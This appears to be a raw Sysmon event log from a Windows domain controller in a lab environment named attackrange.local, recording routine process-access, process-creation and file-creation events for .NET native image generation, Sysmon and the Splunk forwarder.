13:46:48.047{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9148-6005-4702-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:48.032{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9148-6005-4702-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:48.032{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9148-6005-4702-00000000A301}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9149-6005-4D02-00000000A301}1184C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9149-6005-4D02-00000000A301}1184C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.875{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9149-6005-4D02-00000000A301}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.877{59A5CD1D-9149-6005-4D02-00000000A301}1184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.125{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9149-6005-4C02-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.110{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9149-6005-4C02-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:49.110{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9149-6005-4C02-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:52.954{59A5CD1D-9149-6005-4C02-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4dc-0\System.Activities.Presentation.dll2021-01-18 13:46:52.954 10341000x80000000000000006523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:53.969{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-5302-00000000A301}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.969{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-5302-00000000A301}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:53.969{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-5302-00000000A301}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.907{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-5202-00000000A301}3820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.907{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-5202-00000000A301}3820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.907{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-5202-00000000A301}3820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:53.844{59A5CD1D-914D-6005-5102-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6d8-0\System.AddIn.Contract.dll2021-01-18 13:46:53.844 10341000x80000000000000006516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 